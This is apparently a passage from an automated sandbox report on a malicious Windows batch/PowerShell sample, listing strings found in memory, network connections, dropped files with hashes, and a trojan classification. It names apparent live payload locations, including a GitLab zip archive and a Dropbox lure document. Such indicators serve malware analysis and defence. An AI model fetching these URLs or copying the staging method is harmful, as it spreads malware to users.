                Source: powershell.exe, 0000000D.00000002.2817840773.0000028C09584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E97C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
                Source: powershell.exe, 0000000B.00000002.1742213014.000001C95D384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94ECFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1742213014.000001C95D4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0CE12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2864793067.0000028C1B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0B5D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94D311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0B3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2923869128.00000222CB991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E97C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0B5D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                Source: powershell.exe, 0000000B.00000002.1744666842.000001C965357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94D311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0B3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2923869128.00000222CB991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
                Source: powershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: targets.vc.18.drString found in binary or memory: https://core.tcl-lang.org/tips/doc/main/tip/477.md)
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0B5D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
                Source: powershell.exe, 0000000D.00000002.2869746313.0000028C233DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/$L
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
                Source: powershell.exe, 0000000D.00000002.2818131723.0000028C0AEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip
                Source: powershell.exe, 0000000D.00000002.2871755757.0000028C23520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/awsr/ga/-/raw/main/fga2112.zip
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94DF42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0BFD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                Source: pywin32_postinstall.py.18.drString found in binary or memory: https://mhammond.github.io/pywin32_installers.html
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
                Source: powershell.exe, 0000000B.00000002.1742213014.000001C95D384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94ECFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1742213014.000001C95D4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2864793067.0000028C1B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com/cd/0/get/Cg3SINC28znh6C8PbwSNM5cVfu9x
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94DF42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E936000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                Source: powershell.exe, 0000000B.00000002.1745510882.000001C965523000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/vhrhih3o3p0hli
                Source: powershell.exe, 0000000B.00000002.1744666842.000001C965310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.do
                Source: powershell.exe, 0000000B.00000002.1745477599.000001C965430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/garmin_campaign_information_for_partners_v15.do
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                Source: powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49731 version: TLS 1.2

                System Summary

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\reg1.3\tclreg13.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\wsdump.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\normalizer.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9BAB441E18_2_00007FFD9BAB441E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9BAB0FB018_2_00007FFD9BAB0FB0
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\Document\Scripts\normalizer.exe 507498BC73E06611171AB5C765ACE6C8976C8025829EA31F332AB5A89B7CCED6
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\Document\Scripts\pip.exe 00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                Source: classification engineClassification label: mal92.troj.evad.winBAT@28/619@3/2
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
